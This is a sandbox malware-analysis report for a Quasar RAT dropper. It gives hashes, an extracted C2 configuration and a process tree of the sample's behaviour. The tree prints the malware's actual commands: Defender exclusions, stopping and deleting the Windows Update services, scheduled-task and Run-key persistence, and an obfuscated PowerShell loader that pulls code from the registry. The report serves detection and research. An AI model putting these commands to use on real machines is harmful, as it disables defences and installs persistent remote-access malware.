quasar | 7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394

Analysis

max time kernel
20s
max time network
147s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
27-12-2024 11:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe
Size

6.0MB
MD5

fcd7f27674626fbf8bcce5b0e991c03d
SHA1

143515e84e3b48e5bc5286d819f8fd10b8eb5685
SHA256

7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394
SHA512

3464f2200c9eedd17872842b2336786360b34a4bb2f0709b29cb1a8f794b437532193275b43378149424e2d651dba66657d850ccb37e613cb73e76d8a36b98f6
SSDEEP

98304:j3Go5BKtxo5fQIwuhk/UwalC+i0bBHXGgjaQx+OhfzTxzdloaDW:j3GozKYAEk9oCj0bR2Ej1hbTxkJ

Score

10^/10

quasar 4drun discovery evasion execution persistence spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.0

Botnet

4Drun

185.148.3.216:4000

Mutex

c3557859-56ac-475e-b44d-e1b60c20d0d0

Attributes

encryption_key
B000736BEBDF08FC1B6696200651882CF57E43E7
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
3dfx Startup
subdirectory
SubDir

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 3 IoCs

resource	yara_rule
behavioral1/files/0x0006000000019389-27.dat	family_quasar
behavioral1/memory/1900-29-0x00000000013C0000-0x0000000001444000-memory.dmp	family_quasar
behavioral1/memory/2768-35-0x0000000000F00000-0x0000000000F84000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 760 created 420	760	powershell.EXE	5
PID 1372 created 420	1372	powershell.EXE	5

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1604	powershell.exe
1860	powershell.exe
292	powershell.exe
1036	powershell.exe
1792	powershell.exe
2152	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WAGDKRVZ\ImagePath = "C:\\ProgramData\\mxergolzfguk\\kaptsegthwf.exe"	services.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Executes dropped EXE 5 IoCs

pid	Process
3048	doihdjpihrekpoh.exe
536	mklnsegsd.exe
1900	ergbuiluyfd.exe
2768	Client.exe
1368	Bara.exe

Loads dropped DLL 4 IoCs

pid	Process
3052	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe
3052	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe
3052	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe
2244	taskeng.exe

Power Settings 1 TTPs 18 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
1744	powercfg.exe
1032	powercfg.exe
2404	powercfg.exe
2316	powercfg.exe
1696	powercfg.exe
2796	cmd.exe
1860	powercfg.exe
1316	powercfg.exe
1948	powercfg.exe
2400	powercfg.exe
988	cmd.exe
2932	powercfg.exe
1880	powercfg.exe
1488	powercfg.exe
1984	powercfg.exe
2156	powercfg.exe
1756	powercfg.exe
340	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	doihdjpihrekpoh.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 536 set thread context of 2092	536	mklnsegsd.exe	64
PID 760 set thread context of 560	760	powershell.EXE	74
PID 1372 set thread context of 2920	1372	powershell.EXE	75
PID 3048 set thread context of 2708	3048	doihdjpihrekpoh.exe	93

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Cuis\bon\Bara.exe	mklnsegsd.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Tasks\dialersvc64.job	svchost.exe
File opened for modification	C:\Windows\appcompat\programs\RecentFileCache.bcf	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe

Launches sc.exe 24 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1540	sc.exe
3052	sc.exe
1528	sc.exe
1476	sc.exe
376	sc.exe
268	sc.exe
2672	sc.exe
2576	sc.exe
2784	sc.exe
1516	sc.exe
1592	sc.exe
2864	sc.exe
1708	sc.exe
2412	sc.exe
2024	sc.exe
2272	sc.exe
1532	sc.exe
2476	sc.exe
1128	sc.exe
872	sc.exe
2936	sc.exe
1508	sc.exe
1728	sc.exe
2180	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dllhost.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2884	WMIC.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 90a27a275058db01	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1928	schtasks.exe
3012	schtasks.exe
2724	schtasks.exe
2740	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3048	doihdjpihrekpoh.exe
1036	powershell.exe
1604	powershell.exe
2152	powershell.exe
760	powershell.EXE
1372	powershell.EXE
760	powershell.EXE
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
560	dllhost.exe
1372	powershell.EXE
2920	dllhost.exe
2920	dllhost.exe
2920	dllhost.exe
2920	dllhost.exe
560	dllhost.exe
560	dllhost.exe
2920	dllhost.exe
2920	dllhost.exe
560	dllhost.exe
560	dllhost.exe
2920	dllhost.exe
2920	dllhost.exe
560	dllhost.exe
560	dllhost.exe
2768	Client.exe
2920	dllhost.exe
2920	dllhost.exe
560	dllhost.exe
560	dllhost.exe
2920	dllhost.exe
2920	dllhost.exe
560	dllhost.exe
560	dllhost.exe
2920	dllhost.exe
2920	dllhost.exe
560	dllhost.exe
560	dllhost.exe
2920	dllhost.exe
2920	dllhost.exe
560	dllhost.exe
560	dllhost.exe
2920	dllhost.exe
2920	dllhost.exe
560	dllhost.exe
560	dllhost.exe
2768	Client.exe
2920	dllhost.exe
2920	dllhost.exe
560	dllhost.exe
560	dllhost.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	1900	ergbuiluyfd.exe
Token: SeDebugPrivilege	2768	Client.exe
Token: SeDebugPrivilege	1036	powershell.exe
Token: SeShutdownPrivilege	2932	powercfg.exe
Token: SeShutdownPrivilege	1984	powercfg.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeShutdownPrivilege	1744	powercfg.exe
Token: SeShutdownPrivilege	1860	powercfg.exe
Token: SeDebugPrivilege	2152	powershell.exe
Token: SeDebugPrivilege	760	powershell.EXE
Token: SeDebugPrivilege	1372	powershell.EXE
Token: SeDebugPrivilege	760	powershell.EXE
Token: SeDebugPrivilege	560	dllhost.exe
Token: SeDebugPrivilege	1372	powershell.EXE
Token: SeDebugPrivilege	2920	dllhost.exe
Token: SeShutdownPrivilege	1248	Explorer.EXE
Token: SeShutdownPrivilege	1248	Explorer.EXE
Token: SeAuditPrivilege	844	svchost.exe
Token: SeDebugPrivilege	292	powershell.exe
Token: SeDebugPrivilege	3048	doihdjpihrekpoh.exe
Token: SeDebugPrivilege	2708	dialer.exe
Token: SeShutdownPrivilege	2156	powercfg.exe
Token: SeShutdownPrivilege	1880	powercfg.exe
Token: SeShutdownPrivilege	1316	powercfg.exe
Token: SeShutdownPrivilege	1032	powercfg.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2768	Client.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3052 wrote to memory of 3048	3052	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	31
PID 3052 wrote to memory of 3048	3052	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	31
PID 3052 wrote to memory of 3048	3052	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	31
PID 3052 wrote to memory of 536	3052	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	32
PID 3052 wrote to memory of 536	3052	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	32
PID 3052 wrote to memory of 536	3052	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	32
PID 3052 wrote to memory of 1900	3052	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	33
PID 3052 wrote to memory of 1900	3052	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	33
PID 3052 wrote to memory of 1900	3052	7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe	33
PID 1900 wrote to memory of 2740	1900	ergbuiluyfd.exe	34
PID 1900 wrote to memory of 2740	1900	ergbuiluyfd.exe	34
PID 1900 wrote to memory of 2740	1900	ergbuiluyfd.exe	34
PID 1900 wrote to memory of 2768	1900	ergbuiluyfd.exe	36
PID 1900 wrote to memory of 2768	1900	ergbuiluyfd.exe	36
PID 1900 wrote to memory of 2768	1900	ergbuiluyfd.exe	36
PID 2768 wrote to memory of 1928	2768	Client.exe	37
PID 2768 wrote to memory of 1928	2768	Client.exe	37
PID 2768 wrote to memory of 1928	2768	Client.exe	37
PID 536 wrote to memory of 1036	536	mklnsegsd.exe	41
PID 536 wrote to memory of 1036	536	mklnsegsd.exe	41
PID 536 wrote to memory of 1036	536	mklnsegsd.exe	41
PID 536 wrote to memory of 2920	536	mklnsegsd.exe	43
PID 536 wrote to memory of 2920	536	mklnsegsd.exe	43
PID 536 wrote to memory of 2920	536	mklnsegsd.exe	43
PID 536 wrote to memory of 2796	536	mklnsegsd.exe	44
PID 536 wrote to memory of 2796	536	mklnsegsd.exe	44
PID 536 wrote to memory of 2796	536	mklnsegsd.exe	44
PID 536 wrote to memory of 1604	536	mklnsegsd.exe	45
PID 536 wrote to memory of 1604	536	mklnsegsd.exe	45
PID 536 wrote to memory of 1604	536	mklnsegsd.exe	45
PID 2796 wrote to memory of 2932	2796	cmd.exe	49
PID 2796 wrote to memory of 2932	2796	cmd.exe	49
PID 2796 wrote to memory of 2932	2796	cmd.exe	49
PID 2920 wrote to memory of 2784	2920	cmd.exe	50
PID 2920 wrote to memory of 2784	2920	cmd.exe	50
PID 2920 wrote to memory of 2784	2920	cmd.exe	50
PID 2920 wrote to memory of 1508	2920	cmd.exe	51
PID 2920 wrote to memory of 1508	2920	cmd.exe	51
PID 2920 wrote to memory of 1508	2920	cmd.exe	51
PID 2920 wrote to memory of 2936	2920	cmd.exe	52
PID 2920 wrote to memory of 2936	2920	cmd.exe	52
PID 2920 wrote to memory of 2936	2920	cmd.exe	52
PID 2796 wrote to memory of 1984	2796	cmd.exe	53
PID 2796 wrote to memory of 1984	2796	cmd.exe	53
PID 2796 wrote to memory of 1984	2796	cmd.exe	53
PID 2920 wrote to memory of 1728	2920	cmd.exe	54
PID 2920 wrote to memory of 1728	2920	cmd.exe	54
PID 2920 wrote to memory of 1728	2920	cmd.exe	54
PID 2796 wrote to memory of 1744	2796	cmd.exe	55
PID 2796 wrote to memory of 1744	2796	cmd.exe	55
PID 2796 wrote to memory of 1744	2796	cmd.exe	55
PID 2920 wrote to memory of 1516	2920	cmd.exe	56
PID 2920 wrote to memory of 1516	2920	cmd.exe	56
PID 2920 wrote to memory of 1516	2920	cmd.exe	56
PID 2796 wrote to memory of 1860	2796	cmd.exe	57
PID 2796 wrote to memory of 1860	2796	cmd.exe	57
PID 2796 wrote to memory of 1860	2796	cmd.exe	57
PID 2920 wrote to memory of 1740	2920	cmd.exe	58
PID 2920 wrote to memory of 1740	2920	cmd.exe	58
PID 2920 wrote to memory of 1740	2920	cmd.exe	58
PID 2920 wrote to memory of 1760	2920	cmd.exe	59
PID 2920 wrote to memory of 1760	2920	cmd.exe	59
PID 2920 wrote to memory of 1760	2920	cmd.exe	59
PID 2920 wrote to memory of 2272	2920	cmd.exe	60

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:420
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{e1be78f7-7acb-4488-9a11-e0ad87b4b512}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:560
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{7ed147a9-ac17-40cd-8345-2a023c6c4460}
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2920

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
- Sets service image path in registry
PID:476
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:596
- - C:\Windows\system32\wbem\wmiprvse.exe
    C:\Windows\system32\wbem\wmiprvse.exe
    3⤵
    PID:1736
- - C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    3⤵
    PID:288
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:672
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:748
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:808
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1208
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  - Drops file in Windows directory
  - Suspicious use of AdjustPrivilegeToken
  PID:844
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {61D2DC54-CCAD-4720-BD60-9372FDFBC4B1} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Loads dropped DLL
    PID:2244
  - - C:\Program Files\Cuis\bon\Bara.exe
      "C:\Program Files\Cuis\bon\Bara.exe"
      4⤵
      Executes dropped EXE
      PID:1368
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2152
    - - C:\Windows\system32\cmd.exe
        
        cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
        5⤵
        
        PID:1740
      - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:3052
      - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:2672
      - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:872
      - C:\Windows\system32\sc.exe
        
        sc stop bits
        6⤵
        Launches sc.exe
        
        PID:1708
      - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        6⤵
        Launches sc.exe
        
        PID:2576
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        6⤵
        
        PID:2892
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
        6⤵
        
        PID:2716
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
        6⤵
        
        PID:340
      - C:\Windows\system32\reg.exe
        
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
        6⤵
        
        PID:1952
    - - C:\Windows\system32\cmd.exe
        
        cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:988
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        6⤵
        Power Settings
        
        PID:2404
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        6⤵
        Power Settings
        
        PID:340
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        6⤵
        Power Settings
        
        PID:2316
      - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        6⤵
        Power Settings
        
        PID:1696
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell <#tkmebyokj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'Barac' /tr '''C:\Program Files\Cuis\bon\Bara.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Cuis\bon\Bara.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Barac' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Barac" /t REG_SZ /f /d 'C:\Program Files\Cuis\bon\Bara.exe' }
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1860
      - C:\Windows\system32\schtasks.exe
        
        "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn Barac /tr "'C:\Program Files\Cuis\bon\Bara.exe'"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2724
    - - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe ujznpffbjbh
        5⤵
        
        PID:1488
      - C:\Windows\system32\cmd.exe
        
        cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        6⤵
        
        PID:1064
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Name, VideoProcessor
        7⤵
        Detects videocard installed
        
        PID:2884
    - - C:\Windows\system32\cmd.exe
        
        cmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
        5⤵
        
        PID:684
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:760
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1372
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:960
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:112
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:1012
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:904
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1112
- C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
  "C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
  2⤵
  PID:1616
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2012
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2296
- C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
  C:\ProgramData\mxergolzfguk\kaptsegthwf.exe
  2⤵
  PID:1800
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2760
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:2944
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:1128
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2024
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2272
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:1532
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:1540
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:1948
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:2400
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:1756
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:1488
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:876
- - C:\Windows\system32\dialer.exe
    C:\Windows\system32\dialer.exe
    3⤵
    PID:2820
- - C:\Windows\system32\dialer.exe
    dialer.exe
    3⤵
    PID:2252

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:492

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1248
- C:\Users\Admin\AppData\Local\Temp\7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe
  "C:\Users\Admin\AppData\Local\Temp\7462c344e88e0cf17eeea4e7b52776bb973cb1e07be2225d429cc0bf1187d394.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:3052
- - C:\Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe
    "C:\Users\Admin\AppData\Local\Temp\doihdjpihrekpoh.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3048
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious use of AdjustPrivilegeToken
      PID:292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:1868
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2120
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:1528
